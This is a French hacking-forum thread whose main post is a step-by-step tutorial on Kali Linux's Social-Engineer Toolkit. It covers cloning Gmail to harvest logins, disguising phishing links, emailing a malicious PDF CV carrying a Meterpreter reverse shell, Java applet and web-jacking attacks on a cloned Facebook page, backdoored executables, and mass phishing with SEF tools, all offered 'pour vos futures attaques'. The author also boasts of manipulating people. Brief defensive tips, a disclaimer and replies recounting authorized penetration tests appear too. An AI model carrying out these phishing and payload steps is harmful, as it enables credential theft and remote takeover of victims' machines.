Annonce

Réduire
Aucune annonce.

[Kali Linux] V.1 - Social Engineering

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Tutoriel [Kali Linux] V.1 - Social Engineering

    Social Engineering

    Un V.1 on se croirais dans le dernier Film de Spielberg non juste qu'avant de passer au reste je me suis dit mais mince le SE mérite bien un tuto à lui tout seul. Attention je n'ai entrevu qu'une partie du SE car le fil directeur reste l'utilisation de Kali et de ses Tools.

    Suite à ce que j’ai pu entrevoir ces derniers mois, je me suis décider à partager avec vous une partie de mes connaissances en SE. Bien entendu, je n’ai pris en compte que l’utilisation de Kali-Linux puisque j’ai commencé depuis un certain temps à faire découvrir son usage à travers ses Tools.

    Je pense également que si j’ai le temps, j’essaierais de vous parler aussi de ce qui se fait sans forcément des Logiciels ou scripts mais avec du bon sens pratique et de la Manipulation mentale. J’étudie depuis presque un an le Mentalisme grâce à l’invitation d’un ami sur un site privé. J’ai pu grâce à des intermittents du spectacle, des psychologues et divers autres spécialistes comprendre la puissance de la force mentale et ses applications.

    Hacker en faisant du SE, ce n’est pas que rester derrière un Computer mais aussi sortir des sentiers battus et aller au charbon. Il faut être prêt à se découvrir et on comprend que SE le va plus loin que de connaître sa victime ou faire joujou avec des Programmes bien assis mais demande de l’assurance, de la détermination et surtout de la technique. J’ai utilisé presque toute ma vie le Mentalisme, ayant étudié la psychologie des individus au BU de ma Fac étant jeune. Cela m’a permis d’avancer dans la vie et de manipuler systématiquement des personnes pour arriver à mes fins. Mais cela est une autre histoire.

    Vous avez du vous rendre compte que beaucoup de systèmes ont déployé des efforts énormes pour se sécuriser. Ils payent des professionnels pour que rien ne leur arrive mais malheureusement ils dépendent encore beaucoup de personnes physiques, d’humains qui ont des failles. La plus grande faille informatique et l’homme. Souvenez-vous-en !

    Généralement, les employés ne sont pas au courant des astuces et techniques utilisées par les Hackers dans lesquels ils peuvent être utilisés en tant que médiateurs pour obtenir de précieux renseignements, telles que les détails de votre carte de crédit ou les secrets d'entreprise. La sécurité de l'ensemble de l'organisation peut être en jeu si un employé visite un site Web malveillant, répond à l'appel téléphonique d’un hacker, ou clique sur le lien malveillant qu'il/elle a reçu d’une pseudo factice compagnie par e-mail.

    Vous avez du en entendre parler : du Phishing, Spear-phising, Click-jacking, web-jacking et j’en passe. Nous allons en parler tout au long de ce tutoriels et nous verrons comment s’en prémunir mais sachez que rien que la connaissance de l’attaque vous donne 80% de chance de ne pas en être une victime.

    I-Introduction d’une attaque de SE

    Nous allons introduire ce chapitre par SetoolKit, vous allez voir que ce formidable Tools va plus que nous mâcher une partie du travail. Pour travailler je passe par les lignes de commandes désoler mais je pense que l’on peut apprendre que comme ça. A force vous prendrez des automatismes et lorsque vous arriverez à Metasploit vous vous rendrez compte que cela vous a servis de prendre cette habitude.


    Ouvrez un terminale puis tapez :

    Code:
    # cd /usr/share/set
    # ls
    # setoolkit
    https://www.trustedsec.com

    A) Compréhension des attaques par ingénierie sociale

    Sociale Engineering vient d’ingénierie et de sociale. Alors que l'ingénierie signifie une méthode définie pour l'exécution de la tâche en suivant certaines étapes pour atteindre la cible, sociale est ce que l’on vit chaque jour dans notre vie ou notre travail. Nous vivons en société et sommes assujettis à des règles, des codes (Vestimentaires, lois, rang, …). Cela nous impose des choix, le SE va influencer ses choix par le biais de programmes qui vont automatiser son attaque et lui permettre de percer la défense sociale de la cible afin de récupérer les informations qu’il convoite.

    Plusieurs choix d’attaque s’offre à nous suivant l’analyse en Aval que nos aurons fait. Cela va dépendre des personnes engagées, des systèmes et informations reçus lors de l’analyse d’énumération. Dans la phase de recherche, l'attaquant tente de recueillir des informations sur la cible. Les informations sur la cible peuvent être collectées à partir de diverses ressources et de moyens, tels que la fouille de poubelles, le site Web de l'entreprise, des documents publics, des interactions physiques, téléphoniques et ainsi de suite. La recherche est nécessaire pour cibler un seul utilisateur qui sera notre cible. Rappelez vous ou consultez mon précédent tutoriels sur les Tools Kali et la recherche d’informations, inspirez vous en afin de faire votre petite enquête.

    Dans cette phase, l'attaquant fait le mouvement initial en essayant de démarrer une conversation avec la cible sélectionnée après l'achèvement de la phase de recherche. Le principal objectif de cette étape est de rendre la relation plus forte et continuer le dialogue pour exploiter la relation et obtenir les informations souhaitées pour laquelle la communication a été lancée. Il s'agit de la dernière phase de l'attaque par ingénierie sociale, dans laquelle l'ingénieur social quitte la scène attaque ou arrête la communication avec la cible, sans créer une scène ou de faire quoi que ce soit qui va faire la cible suspecte. Une fois la relation établie et suivant son degré de confiance nous allons pouvoir procédé à l’attaque SE.

    Beaucoup de techniques se sont imposés mais parfois l’imbécilité d’un administrateur système suffit. Pour exemple, cet ancien site d’un ami qui m’avait demandé de lui mettre en place ainsi que le design et la sécurité. Tant bien que mal le site tourner bien. Arrivant à plus de 10000 membres il a du prendre un staff, puis il a passé une modératrice qu’il connaissait depuis longtemps Admin avec passe droit. C’était au cas où il lui arriver un truc. Mais voila la jeune novice Admin s’est trouver une amie handicapé sur FB qui en plus étaient ingénieur informatique. Cette personne un jour où le big boss n’était pas la lui a demandé conseil comme d’habitude.

     Salut ma belle tu va bien ?
     Oui et toi ?
     Ben en fait j’ai un soucis et Z (on dira qu’il s’appelle Z et elle R) n’est pas la
     Ok montre-moi par skype
     Ben te suffit de faire ça dans le panel et c’est tout.
     Ok ThX
     De rien mais tu devrais lui dire que son thèmes il a un module avec failles énormes
     Sérieux ???
     Oui et en ce moment ils piratent tous ce même module il a été placardé sur Zero-Day
     mais comment je peux faire
     C’est compliqué comment te dire mince fff tu ne peux pas me mettre des accès ?
     Non sais pas faire non plus mais si tu veux je peux te filer les miens
     Ok envoie sur skype tes accès je m’en occupe tu diras que c’est toi quand il viendra il sera fier
     Merciiiiiii ma louloute
     De rien R ca me fait plaisir et sur ma chaise je peux rien faire d’autres taçon
     Je sais ma pauvre big biz a toi te laisse on me phone voila mes passes a+++

    Et voila le travail plusieurs techniques de Mentalisme ont été mis en œuvre après ce rapprochement via FB comme par exemple l’empathie. Mais le mal a été fait la personne qui n’étais qu’un hacker de 15ans un garçon a poser un backdoor et a laisser le tout mijoter quelques mois puis a fait son travail en défacant le site mais en ayant récolter un maximum d’informations avant. Cela aurait pu être évité mais l’ignorance et la confiance d’une seule personne a compromis tout le système.

    Voyons les différentes techniques d’attaques possibles :

    Piggybacking: Dans ce type d'attaque, le pirate profite en piégeant le personnel autorisé à pénétrer à l'intérieur d'une zone restreinte de la société ciblés, tels que la salle des serveurs. Par exemple, l'attaquant X pénètre dans la société ABC comme un candidat pour une interview, mais plus tard pénètre dans une zone restreinte en piégeant une personne autorisée, en affirmant qu'il s'agit d'un nouvel employé de la société et donc il n'a pas un ID employé, et à l'aide de l'ID cibles peut usurper une identité. Une fois dans la place il pourra recueillir des informations à partir d'un ordinateur de bureau ou même compromettre le service entier en introduisant un virus. Le Hacker peut utiliser un costume pour argumenter son attaque sociale. Dans le Mentalisme on parle souvent de cette utilisation du costume pour créer un renforcement sociale envers la cible. Imaginons que l’on veut des informations sur une banque, on connaît l’adresse e-mail et postale du directeur. On sait par recherche que son fils dont on a le FB a eue des soucis avec la police lors d’une soirée arrosé et a accrochée une autre voiture. On pourrait très bien aller chez cette personne se faire passer pour l’agent d’assurance car il y a eu plainte. Un costume avec une mallette, quelques papiers récupéré ou plutôt subtilisé dans une agence d’assurance et on fait la farce. La peur est mauvaise conseillère et nous faire faire parfois des choses inattendus.

    Usurpation d'identité : Naturellement c'est le Baba du SE.Il donne lieu à des techniques impressionantes et à pour but d'intégrer le pivoting. Passer d'un bureau à l'autre pour avoir les informations recherchés.

    Ingénierie sociale inverse: La on va chercher à conforter les personnes dans un sentiment d'impuissance en se mettant en position d'autorité. Comme dans le premier exemple où l'on est en position de force vis à vis de l'infraction du fils.

    Dumpster diving: C'est la fouille des poubelles. Le hacker va visualiser tout ce qu'il peut en ramassant au sol, dans les corbeilles, ... qui pourrait lui donner un avantages pour la phase d'exploitation.l

    Se présentant comme un légitime utilisateur: Bonjour la banque X j'ai perdus mon mot de passe pour acceder à mes dossiers. Le petit plus le demander en direct et affronter un bureau. Certains on le culot d'aller voir le directeur alors qu'il ne bosse pas dans la société. J'ai un amis en BTS qui avait arreter les études jugé inutile. Il s'est fait passer pour un gars d'une boite d'electronique , il a ainsi pu vérifier qu'il chercher du personnel dans le secteur ascenceur et maintenance. Il a créé un CV avec son BTS et pleins de faux diplômes , il a été engeagé avec un CDI. Nous on bucher encore , il est venus nous narguer avec sa voiture de fonction

    Attention ces exemples sont pour certains fictifs, et dans la réalité les peines encourus sont lourdes en cas d’usurpation d’identité, violation de bien privé et j’en passe.

    Bon on va revenir à notre Kali et reprendre une voie d’attaque SE via logiciels. Voyons ensemble les principales attaques via computer cette fois:

    Pop-up Windows : Par le biais de Pop up, on va amener les utilisateurs à cliquer sur un lien hypertexte qui redirige les utilisateurs et les force à visiter la page web de l’attaquant, en leur demandant de donner leurs informations personnelles ou leur demander de télécharger un logiciel qui pourrait avoir joint des virus.

    attaque d’Initié (Inside Attack) : Ce type d'attaque est exécuté à partir de l'intérieur de la cible Réseau. La plupart des attaques internes sont orchestrés par des employés mécontents qui ne sont pas satisfaits de leur position dans l'organisation ou parce qu'ils ont des rancunes personnelles contre un autre employé ou la Direction.

    Phishing: Des spammeurs qui envoient souvent des courriels en masse et prétendre être d’une instance officiel (caf, FB, banque, loto,…). Ils vous demandent de cliquer sur un lien dans l'e-mail pour fournir les détails de votre carte de crédit ou entrer des informations telles que votre prénom, adresse, âge, et la ville. Cette méthode va permettre d’obtenir rapidement des informations et directement de la source. Le hacker pourra aussi faire un clone du site officiel afin d’avoir un visuel plus accrocheur.

    l’escroquerie nigériane 419 (The "Nigérian 419" scam) : Dans l'escroquerie nigériane, l'attaquant demande à la cible de faire des paiements francs ou faire des transferts d'argent. On l'appelle 419 parce que '4-1-9' est une section du Code pénal nigérian qui déclare cette pratique illégal. L’attaquant ou scammers envoient un e-mail à la victime en lui demandant de l’argent car cette personne est coincé dans un pays. Dernièrement une histoire similaire a encore frappé un pauvre bougre qui a donner quotidiennement de l’argent à une femme camerounaise ( on se comprends ) qui avait des soucis pour venir le voir à France.

    l'attaque SE par un SMS falsifié : Dans ce type d'attaque, le hacker enverra un SMS à la cible prétendant être du département de sécurité de leur banque et demandant avec urgence que la cible appelle le numéro indiqué. Une personne qui se laisse prendre toujours par cet aspect urgence, grave, problème,… enverra des informations à un hacker. Le SE ne pratiquera l’attaque qu’une fois sur qu’elle aboutira et surtout ne parlera d’argent qu’une fois qu’il sera certains que la personne ne coupera pas le contact. C’est le But du SE l’information sous toutes ses formes et surtout à tout prix.

    Voila ce petit cours succinct inspiré de plusieurs PDF et cours que j’ai pu lire s’achève ici passons à la pratique avec Kali.
    Kali Linux>Exploitation Tools>Social Engineering Toolkit>se-toolkit


    Vous voila dans l’interface du script. Vous pouvez sans tarder updater en tapant 4 puis 5.

    B)Attaque par Website Cloning

    Nous allons créer un clone d’un site ou autre et une fois fait envoyer cette url à la cible. Cette dernière lorsqu’elle se connectera à notre site factice, nous donnera en même temps ses ID.

    Tapez sur 1 : 1) Social-Engineering Attacks


    Cela ouvre un autre menu :

    1) Spear-Phishing Attack Vectors
    2) Website Attack Vectors
    3) Infectious Media Generator
    4) Create a Payload and Listener
    5) Mass Mailer Attack
    6) Arduino-Based Attack Vector
    7) Wireless Access Point Attack Vector
    8) QRCode Generator Attack Vector
    9) Powershell Attack Vectors
    10) Third Party Modules
    Tapez 2 : 2) Website Attack Vectors

    Et encore un menu
    1) Java Applet Attack Method
    2) Metasploit Browser Exploit Method
    3) Credential Harvester Attack Method
    4) Tabnabbing Attack Method
    5) Web Jacking Attack Method
    6) Multi-Attack Web Method
    7) Full Screen Attack Method
    On va tapez 3: 3) Credential Harvester Attack Method

    No us voila enfin dans le vif du sujet.
    1) Web Templates
    2) Site Cloner
    3) Custom Import
    On va utiliser 2 site cloner pour cela il nous faut notre IP.

    Ouvrez un terminale à côté et tapez :

    Code:
    # ifconfig –a
    C’est parti ! Entrez 2 puis l’IP que l’on a copié, ensuite l’url du site à cloner. Je vais prendre Gmail pour changer un peu de FB que tout le monde prends.

    https://accounts.google.com

    Si Apache n’est pas en route il vous le signale et vous demande si vous voulez qu’il le démarre répondez Y et cliquez pour la suite. Il vous signale que le clone a été bien effectué et que son chemin est : All files have been copied to /var/www.


    Vous aurez index.html avec Gmail clone dedans. Chaque fois que quelqu’un essaiera de se connecter vous aurez un fichier .txt noté Harvester avec la date et l’heure, ouvrez le avec leafPad ou un autre éditeur de texte. A l’intérieur vous aurez les ID de la cible.

    C’est clair qu’envoyer tel quel notre url ne fera pas de victime loin de la, on la voit venir à 200km cette url mais on peut essayer avec ses sites online de modifier un peu l’url.

    Https://bitly.com/: cette offre une redirection des URL de service en temps réel suivi de lien.
    • Tinyurl.com/: avec TinyURL, vous pouvez faire une URL plus petit, afin qu'il puisse fonctionner pour n'importe quelle page de votre site.
    • 1url.com/: C'est un libre raccourcissement des URL et service de redirection.
    Http://cli.gs/: cette offre personnalisable url ainsi que le suivi et la redirection d'URL. D'autres caractéristiques uniques comprennent privé, en temps réel, et très détaillée des états ainsi que géo-cible les URL en fonction du pays du visiteur.
    Les solutions pour enrayer ce problème. Informez les personnes sensibles. Cette attaque est extrêmement compliquée à mettre en œuvre pour le hacker car elle se voit vite. Regardez le bas de page de votre navigateur avant de cliquez. Utilisez des services anti-spam, anti-Phishing. on peut aussi Changez régulièrement de mot de passe surtout en cas de doute, utilisez une Longueur et une complexité de mots de passe suffisante, un Compte se bloquant après un nombre d'essais ratés et aussi la réouverture de session en cas d’échec peuvent être des solutions pour minimiser les risques.

    II-Les Vecteurs D’attaque

    Nous allons voir parallèlement au chapitre précédent :

    • Web jacking
    • Spear-phishing
    • Java applet attacks

    A)WebJacking Method

    Cette méthode fonctionne en faisant un clone du site web (comme Tal) et à envoyer ce lien malveillant à la cible indiquant que le site original a été déplacé. Lorsque l'URL en surbrillance est cliquée, une fenêtre pop up s’ouvre. Cette méthode utilise iframe remplacement pour rendre l'URL en surbrillance link apparaissent légitimes.
    Allez c’est partis : Cliquez déjà sur suivez le guide

    1) Social-Engineering Attacks
    2) Website Attack Vectors
    5) Web Jacking Attack Method
    2) Site Cloner

    Ouvrez le navigateur et allez sur l’url http://VotreIP/

    Pareil qu’avant aller dans /var/www


    Vous y trouverez vos fichiers avec les ID des personnes connecté mais 2 index le premier si vous l’ouvrez vous y verrez la redirection.
    Vous pouvez changer à loisir le mot de redirection

    B)Spear-Phishing

    Bien nous avons dans la première phase de reconnaissance puis d’énumération récolter une quantité d’informations sur notre cible : comme l'adresse d'IP, IP adressent la gamme, les numéros de téléphone, l'adresse de bureau, et l'adresse e-mail officielle d'une personne importante dans l'organisation.

    Le Spear-Phishing fait partie des attaques les plus importantes de nos jours surtout depuis l’avancé des nombreux Tools sur ce sujet. On l’appelle aussi APT attaque (advance persistent threat).

    Allez c’est partis :Suivez le guide

    1) Social-Engineering Attacks
    2) Spear-Phishing Attack Vectors

    Oulla un nouveau menu, je vais vous expliquer.

    1) Perform a Mass Email Attack
    2) Create a FileFormat Payload
    3) Create a Social-Engineering Template
    La première attaque : Attaque par Mass-Mail est utilisée lorsque l'attaquant veut envoyer des e-mails à plus d'une personne.
    La 3eme attaque est utilisée pour créer notre propre modèle ou objet d'un courrier.
    Dans cet exemple, nous allons prendre la deuxième attaque, créez un fichier Payload fileformat. Nous allons utiliser un exemple de scénario de l'envoi d'un CV pour le département des RH d'une entreprise en malveillantes format PDF. Une fois que le fichier est ouvert dans l'ordinateur cible, nous aurons un Shell.

    Nous allons donc vérifier comment effectuer une masse attaque par e-mail :

    Code:
     Set : phishing>1
    le menu suivant montre une liste des formats de fichier (après nous type 11 sur la ligne de commande) que nous voulons exploiter sur une machine distante comme un attaquant d'exploiter la machine. Le format PDF est le format par défaut :
    On choisis le payload 12.

    12) Adobe PDF Embedded EXE Social Engineering

    Il nous donne encore 2 choix :

    Nous pouvons utiliser n'importe quel fichier PDF à partir de notre système pour créer un fichier PDF malveillant pour l'attaque,
    Ou on peut éventuellement utiliser le fichier vide par défaut qui est fourni par le payload.
    On va prendre la 2 eme option :
    Une fois notre fichier, format et type choisis on a le choix du payload pour finaliser notre exploit.
    Je ne vais pas détailler chacun sinon le tuto n’en finirais pas renseigner vous le nom est explicite.
    On va prendre le : 2) Windows Meterpreter Reverse_TCP


    On a à droite une explication : Envoyer un Shell Meterpreter sur la victime sous forme donc d’un PDF Malveillant et renvoyer à l’attaquant une connexion.
    Une fois choisis on vous demande l’IP de la machine cible et le port 443 par défaut laisser le et cliquer sur la suite. Il va générer le PDF qui s’appellera par exemple : moo.pdf
    Vous pouvez soit : 1 le garder tel quel ou 2 changer son nom c’est clair que l’on peut trouver mieux.
    Tapez 2 et renommez le comme vous voulez : Mon_CV.pdf par exemple
    La on vous propose de l’envoyer qu’à une seule personne par e-mail ou à plusieurs cliquez 1 ou 2.
    Moi je clique 1

    1. Pre-Defined Template
    2. One-Time Use Email Template

    Simple en 2 vous construisez vous-même votre contenu d’envoie pour le PDF dans le 1 vous choisissez ceux par défaut. Cliquez 1 on verra par la suite.
    On va prendre le 6 : Order Confirmation

    Mettez le Mail de la Victime puis choisissez votre envoie moi je mets 1 par mon Gmail, Entrer le Gmail puis le nom d’envoie et finalement le mot de passe. Si vous avez peur créé vous un mail factice d’envoie. Choisissez si vous voulez envoyer ce message en haute priorité ou non. Je mets Y yes et voila envoyer.


    Dès que la cible ouvre le mail et enregistre sur son PC le document PDF, sa machine sera compromise et reverse Meterpreter session sera ouvert à l'attaquant. Dès que la cible exécute l'outil de transfert, ce qui est généralement le fichier lié, Meterpreter établit un lien de réseau et envoie un appel à Metasploit sur le côté d'attaquant. Metasploit reçoit l'appel et configure le client, ce qui rend le Shell distant de la cible accessible à l'attaquant. Avec l'aide de Meterpreter, l'attaquant peut executer beaucoup de choses, comme le fait de télécharger un dossier et le fait d'exécuter un dossier sur la machine lointaine ou même lister des dossiers et fichiers.


    C)Java Applet Attack

    Un applet peut être décrit comme un programme Java exécuté sur un navigateur Web. Fondamentalement, le concept d'un applet Java vient du concept de l'incorporation dans un page HTML pour afficher l’applet, l'environnement d'exécution Java (JRE) est requis. La Java Virtual Machine peut être soit un plugin du navigateur Web ou une exécution séparée de l’environnement. Java Applet Attack est la plus célèbre et la méthode d'attaque la plus efficace pour compromettre un système. Il a été développé par Thomas Werth. Applet Java Attaque fonctionne sur Windows, Linux et Les plates-formes Mac OS.

    On commence suivez le guide :

    1) Social-Engineering Attacks
    2) Website Attack Vectors
    3) 1) Java Applet Attack Method
    4) On clone on clone : 2) Site Cloner
    5) set> Are you using NAT/Port Forwarding [yes|no]: no
    6) Mettez L’IP cible de la machine

    La on vous demande de choisir :
    1. Make my own self-signed certificate applet.
    2. Use the applet built into SET.
    3. I have my own code signing certificate or applet.
    Qui signifie :

    1. Faire mon propre certificat auto-signé applet.
    2. Utilisez l'applet intégrée dans SET.
    3. J'ai mon propre certificat de signature de code ou de l'applet.


    On va tapez 2 et prendre celui du Tool ca ira plus vite et sans erreur. Entrez ensuite l’url du site à cloner moi je prends :

    https://facebook.com/

    Et pouf pas finis hé oui. Il faut choisir son payload de compromission maintenant.
    On prends le même qu’avant : 2) Windows Reverse_TCP Meterpreter

    Prenez : Backdoored Executable c’est le mieux de tous. Puis cliquez pour laisser 443 port par défaut.

    Allez sur la page de votre http://votre_IP

    Dés que la cible accepte la licence Java, Une session Meterpreter est ouverte et l’attaquant peut enfin exécuter sur le computer cible.


    III-Création Set


    A)Payload

    Setoolkit a la particularité de laisser de la liberté pour la création de payload et divers.

    Tapez 1 puis 4) Create a Payload and Listener

    La prochaine étape dans la création du payload est de fournir l'IP de la machine attaquante où la liaison inverse pourra être faite. Une fois cette machine cible exploité, le payload devra ouvrir un Shell sur la machine cible. Entrez votre IP.

    Choisissez le type de payload on va prendre 2) Windows Reverse_TCP Meterpreter
    Choisissez encore 4) Backdoored Executable
    Laissez 443 ou choisissez un autre moi je passe.
    On vous demande si vous voulez commencez l’écoute tapez y et regardez.

    B)Bombe Mailing

    C’est le fait d’envoyer une attaque de type Ddos sur un Mail cible. On sature le mail qui bloque littéralement. Nous, On va voir comment avec Kali et Setoolkit faire une attaque par Mass Mail. C'est-à-dire que l’on va envoyer un mail avec un objet malicieux incorporé dans le corps du message : Trojan, ver, malware, keylogger, phishing,…

    1)Social-Engineering Attacks
    5)Mass Mailer Attack

    2 options :

    1. E-Mail Attack Single Email Address
    2. E-Mail Attack Mass Mailer
    Toujours pareil soit sur une seule adresse mail soit sur une liste. Cette liste vous pouvez la mettre sur le bureau et renseigné si vous choisissez la 2eme option pour que Set la lise et l’exécute.

    Votre liste doit ressembler à l’exemple :

    [email protected]
    [email protected]
    [email protected]

    /home/MA_Liste/ihazemails.txt Ou le chemin ou vous l’avez placer : exemple : /etc/ Liste pour moi

    Ensuite on vous demande de donner votre mail, comme avant pareil. Puis, on va vous demandez si vous voulez que le message soit envoyer soit en texte soit en html : h ou p.

    Choisissez puis renseigner le corps du message partie importante puisque vous allez y mettre par exemple l’url de votre page phishing.



    IV-Autre Tools

    Je vous avez dit que je vous parlerais d'autres Tools que l'on peut installer afin d'affiner et augmenter l'arsenal de Kali. En voici un premier exemple.

    http://spl0it.org/projects/sef.html

    Installation : Mettez les dépendances

    Code:
    # sudo perl -MCPAN -e 'install Net::SMTP'
    Ensuite télécharger le paquet : http://spl0it.org/files/SEF-1.0.tar.gz

    Ensuite, décompresser le et lancer le :

    Code:
    # cd Desktop/SEF-1.0
    # perl Makefile.PL
    # make
    # make install
    So Good revenez root et lancez:

    Code:
    # cd /usr/local/bin
    puis

    sefemails, sefnames, sefphish, sefpayload Yes ils sont installé encore de news Tools pour kali

    SefeMails
    Sefemails est utilisé pour générer une liste d'adresses de courrier électronique dans le but d'effectuer une attaque de phishing en vrac contre une organisation spécifique. La syntaxe pour exécuter cet outil dans Kali Linux est comme suit :
    sefemails [Options]
    C’est partis on va prendre un site au pif paf pouf. Je ne vous donnerais pas le mien
    sefemails -d gmail.com -n Name-List -s 2
    Cela vous permet d’avoir tous les mails d’une cible à partir d’une liste de nom de ce site. Il vous faut pour cela avoir les noms et surtout le mail utilisé. Gmail,outlook,…
    Sefphish
    Tool pour envoyer en mail de masse du phishing. Il utilise un dossier de configuration YAML pour le rendre plus facile.
    Sefnames
    Ce Tool inverse des adresses de courrier électronique et extrait le nom complet de la victime. Il est utile lorsque vous avez plusieurs adresses e-mail que vous avez besoin de convertir à noms.
    Sefpayload
    # sefpayload <IP> <port> <Name Of the Exe> <Payload>
    Outil pour générer un reverse_tcp metasploit meterpreter payload. Par défaut, elle suppose que Metasploit est installé dans /pentest/exploits/action urbain3.
    Je ne m’attarderais pas plus sur ces derniers Tools car je ne les ai utilisé que très peu de fois et donc mes connaissances sont limités. Mais je vous engeage à les découvrir comme moi et peut être les adopter pour vos futures attaques.

    En dernier lieu cette url pour tester on line Set:

    https://attendee.gototraining.com/r/6666899010416816129

    Pour vous donner une idée basique de Set. Je n’ai utiliser que la partie SE du script , je n’ai pas parler de Beef ou d’autres que je compte développer dans la partie Kali sur les attaques XSS et divers.J'espère que cela vous aidera pour vos futures essais.
    Voici une petite aide supplèmentaire pour vous retrouver sur kali :

    Vous pouvez faire :
    Code:
    # apt-get autoclean (les .deb téléchargés sont stockés dans /var/cache/apt/archives. autoclean: supprime les archives obsolètes.)
    # apt-get clean (efface tous les packages en cache) 
    # whereis set (vous indique le chemin d'un dossier ou fichier que vous cherchez)
    set: /usr/share/set
    # cd /usr/share/set/ ./set (Vous allez sur le chemin indiquer et activer le script)
    Voila merci à vous tous et à la prochaine.

    PS : J'explique dans un seule but de prévention. Je ne pirate jamais autrui et je vous conseille de faire de même. Tester sur vous même afin d'apprendre et reconnaître ce genre d'attaque.
    Dernière modification par DreAmuS, 02 août 2014, 09h38.

  • #2
    Merci du tuto !
    Mais personnellement rien ne marche quoi que je prenne comme option, ça me ramène toujours vers une erreur.

    Commentaire


    • #3
      Merci énormément pour ton tuto
      Cela fait très longtemps que j'en cherche un comme ça, je veut dire,qui s'intéresse vraiment a la psychologie de la chose. Comme on l'entend dire souvent : la faille est humaine !!
      Bref tout sa pour dire qu'il faut vraiment que je me penche sur le mental, sur la psychologie. Si tu as deux ou trois liens je suis preneur mais je vais aussi faire mais petite recherche.
      En tout cas pour moi ce soir c'est bien calé devant mon ordi avec un peut de Gun N Roses en fond
      PS : Si tu as des liens sur tout ce qui est psychologie n'hésite pas a me MP.
      @bioshock
      Twitter: @ContactBioshock
      Mail: [email protected]

      Commentaire


      • #4
        Dans un premier temps merci. Pour ce qui est des erreurs, elles proviennent surement de ton installation ou de ton exécution.

        Mais pour vous satisfaire, je vais vous faire un petit cadeau Bonus.


        Chris Hadnagy est payé pour tromper les gens et il a obtenu d'assez bons résultats au cours de ces dernières années. Un cofondateur de social-engineering.org et auteur de l'ingénierie sociale: L'art du Hacking humain.

        Hadnagy utilise des tactiques de manipulation pour montrer à ses clients comment les criminels obtiennent des informations privilégiées. Hdnagy a présenté trois histoires mémorables de tests d'ingénierie sociale qu'il a inclus dans son nouveau livre et souligne ce que les organisations peuvent apprendre de ces résultats.

        Je vais vous raconter 3 de ces historiettes qui vont vous faire comprendre que la manipulation est un art et que la communication est son arme.



        Le PDG présomptueux
        Hadnagy décrit comment il a été embauché en tant qu'auditeur SE pour accéder aux serveurs d'une société d'impression qui avaient certains procédés exclusifs.. Lors d'une réunion téléphonique avec le partenaire d'affaires de Hadnagy, le PDG l'a informé que "le piratage serait presque impossible» parce qu'il «gardait ses secrets mieux que sa propre vie.

        "Il était le gars qui n'a jamais été piégeur", a déclaré Hadnagy.
        "Il pensait que quelqu'un allait probablement l'appeler tout simplement et lui demander son mot de passe. Il était prêt pour une approche comme ça."

        Après quelques collectes d'informations, Hadnagy a trouvé les emplacements des serveurs, des adresses IP, des adresses électroniques, numéros de téléphone, adresses physiques, serveurs de messagerie, les noms et titres des employés et bien plus encore.

        Il a utilisé des techniques d'investigation que permettent les outils actuels de SE moderne déployé dans des plateformes toutes prêtes par exemple Kali Bug oups désolé Kali V2.0.


        Mais le prix réel de la connaissance est venu quand Hadnagy a réussi à apprendre que le PDG avait un membre de sa famille qui avait lutté contre le cancer et a survécu. En conséquence, il était intéressé et impliqué dans la collecte de fonds pour le cancer et la recherche. Grâce à Facebook, il a également été en mesure d'obtenir d'autres détails personnels sur le PDG, comme son restaurant préféré et/ou son équipe sportive favorite.

        Armé de toutes ces informations, il était prêt à frapper.
        Il a appelé le PDG et s'est fait passer comme une collecte de fonds à partir d'une ligue de cancer dont le PDG avait eu affaire à l'époque. Il l'a informé qu'ils offraient un tirage au sort en échange de dons. Les prix seraient des billets pour un match joué par son équipe sportive préférée, ainsi que des bons cadeaux de plusieurs restaurants, y compris son lieu de prédilection.

        Le PDG et a accepté de laisser Hadnagy lui envoyer un PDF avec plus d'informations sur la collecte de fonds. Il a même réussi à obtenir du PDG de lui dire quelle version d'Adobe Reader il avait parce que :



        A-t-il déclaré au PDG :"Je tiens à m'assurer que je vous envoie un fichier PDF que vous pourrez lire."
        Que d'attention !

        Peu après, il a envoyé le PDF, le PDG l'a ouvert, l'installation d'un malware a permis à Hadnagy d'accéder sans souci à sa machine. Lorsque Hadnagy et son partenaire ont rapporté à la société leur succès, le PDG était naturellement en colère, dit Hadnagy.

        "Il a estimé qu'il était injuste d'avoir utilisé quelque chose comme ça, mais c'est comment le monde des hackers fonctionne», a déclaré Hadnagy.

        "Un pirate malveillant n'aurait pas hésité à utiliser cette information contre lui."

        Leçon 1: Aucune information, indépendamment de sa nature personnelle ou affective, est hors limites pour un ingénieur social qui cherche à faire du mal
        Leçon 2: Plus la personne est arrogante plus elle sera piégée. Un consultant en sécurité a récemment déclaré que les dirigeants des OSC sont les cibles les plus faciles d'ingénierie sociale.


        Bien bien passons à cette seconde histoire tout aussi intéressante j'en suis sur.



        L'employé au grand coeur.
        Le prochain cas de Hadnagy était un client de parc à thème qui était préoccupé par la compromission potentielle de son système de billetterie.

        Les ordinateurs utilisés pour le check-in client contenaient également des liens vers les serveurs, les renseignements sur les clients et les dossiers financiers.

        Le client craignait que, si un ordinateur de check-in était compromis, une violation de données graves puisse se produire.

        Hadnagy a commencé son test en appelant le parc, se présentant comme un vendeur de logiciels. Il offrait un nouveau type de logiciel "PDF-lecture", dont il voulait que le parc essaye à travers une offre d'essai gratuite et sans engagement.

        Il a demandé quelle version ils utilisaient "presently" et a obtenu l'information facilement. Il était prêt pour l'étape deux.

        Hadnagy a utilisé sa famille afin d'assurer le succès. À la tête de l'une des fenêtres de billets avec sa femme et son enfant, il a demandé à l'un des employés qui se tenaient là, si elles pouvaient utiliser leur ordinateur pour ouvrir un fichier à partir de son e-mail.

        Le courriel contenait une pièce jointe PDF pour un coupon qui leur donnerait l'admission de réductions.

        "Le tout aurait pu s'arrêter là si l'employait disait« Non, désolé, je ne peux pas le faire, »a expliqué Hadnagy.

        "Mais en me voyant comme un papa, avec un enfant anxieux d'entrer dans le parc, tirant sur les cordes du cœur..."
        L'employé a accepté, et le système informatique du parc a été rapidement compromis par le mauvais PDF Hadnagy.

        En quelques minutes, le partenaire de Hadnagy a reçu un texto pour lui faire savoir qu'il était entré «dans le système» et que la «collecte d'informations pouvait être lancée pour leur rapport». Soulignant aussi que, bien que la politique du personnel du parc stipule qu'ils ne doivent pas ouvrir les pièces jointes provenant de sources inconnues (même un client ayant besoin d'aide), il n'y avait pas de règles en place pour l'appliquer.
        «Les gens sont prêts à aller très loin pour aider les autres», a déclaré Hadnagy.

        Leçon 3
        : La politique de sécurité est seulement valable que si elle est appliquée.
